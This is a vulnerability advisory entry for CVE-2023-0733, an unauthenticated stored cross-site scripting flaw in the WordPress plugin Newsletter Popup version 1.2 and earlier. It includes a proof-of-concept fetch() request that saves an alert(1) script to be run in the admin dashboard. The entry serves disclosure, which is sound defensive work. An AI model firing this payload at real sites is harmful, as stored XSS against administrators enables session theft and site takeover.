Lucene search
Lana CodesWPEX-ID:FED1E184-FF56-44FE-9876-D17C0156447AHistoryMay 02, 2023 - 12:00 a.m.
Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2023-05-0200:00:00
Lana Codes
56
newsletter popup
unauthenticated
stored xss
wordpress
dashboard
0.001 Low
EPSS
Percentile
37.7%
The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks
1. Create a Newsletter popup (any will do) and publish it.
2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.
4. The alert will trigger successfully.Related
prion
prion
Cross site scripting
2023-05-30 08:15:00
cvelist
cvelist
CVE-2023-0733 Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2023-05-30 07:49:10
wpvulndb
wpvulndb
Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2023-05-02 00:00:00
cve
cve
CVE-2023-0733
2023-05-30 08:15:09
nvd
nvd
CVE-2023-0733
2023-05-30 08:15:09
wordfence
wordfence